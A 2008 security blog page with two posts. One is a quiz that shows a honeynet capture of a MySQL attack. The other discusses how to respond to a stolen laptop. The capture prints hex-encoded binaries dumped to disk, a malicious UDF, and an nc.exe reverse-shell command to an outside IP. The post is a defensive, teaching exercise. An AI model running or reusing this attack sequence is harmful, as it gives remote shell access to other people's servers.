Wednesday, March 26, 2008

Name that hack

Today my honeynet was the victim of an oldie but goodie. It's time to play "NAME THAT HACK". What do you think is happening here?

A...
5.0.45-community-nt.^!..u"G|_G${.,.................c]+Yba?Ti4d{.
@..........@........................root....'NF.g".|Z/...=ao.nmysql.
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
( ...INSERT INTO cmd (codetab) VALUES ( 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000e5915857a1f03604a1f03604a1f0360449ef3d04a0f0360422ec3804aaf0360449ef3c0489f03604a1f0370498f03604c3ef2504a2f0360449ef2004a0f0360449ef3204a0f0360452696368a1f0360400000000000000000000000000000000504500004c010400a64156440000000000000000e0000e210b010600005000000030000000000000bd1100000010000000600000000000100010000000100000040000000100000004000000000000000090000000100000000000000200000000001000001000000000100000100000000000001000000060690000800000009c64000028000000000000000000000000000000000000000000000000000000008000007004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000d80000000000000000000000000000000000000000000000000000002e74657874000000b840000000100000005000
0000100000000000000000000000000000200000602e72646174610000e009 [Truncated by me])
...........
5....SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
......."...
?....CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
...........
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
(....INSERT INTO cmd (codetab) VALUES ( 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010400b98eae340000000000000000e0000f010b010500009800000062000000000000004c00000010000000b0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000002001003c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0210100640100000000000000000000000000000000000000000000000000002e7465787400000070970000001000000098000000040000000000000000000000000000200000602e726461746100001704000000b0000000060000009c0000000000000000000000000000400000402e646174610000004452000000c00000003e000000a200000000000000000000000000
00400000c02e696461746100005c070000002001000008000000e000 [truncated by me])
...........
3....SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
......."...
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
D....SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
.....R....def...cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')..?.........................537912269770588160.........
.....


Where would you begin your investigation?

Thursday, March 20, 2008

When laptops grow legs

One fine day in Europe an American businessman was traveling by train. There was suddenly a large commotion occurring somewhere up ahead in the passenger car. The businessman set his laptop down on top of his laptop bag on the empty seat next to him and stood up to observe the commotion. There appeared to be an argument of some form between two gentlemen. As the businessman sat back down he reached over to grab his laptop, except it wasn't there. Looking all around, he didn't see anything that looked suspicious. The laptop had been stolen right out from under his nose..literally.

Upon arriving back home, the businessman alerted his IT support staff that his laptop had been stolen and that he needed a new one right away. Following policy, the IT staff member notified his security staff.

Does knowing what was on the laptop make a difference? What if you don't know what was on the laptop exactly. Can you trust that the businessman claims "there wasn't client data on there" or "There wasn't credit card information on my laptop".

Do you consider the laptop compromised automatically and look for a backup of the laptop to use as a reference point for notifying individuals? Do you ignore the fact that the system was stolen?

If a case like this gets turned over to you, how do you handle it?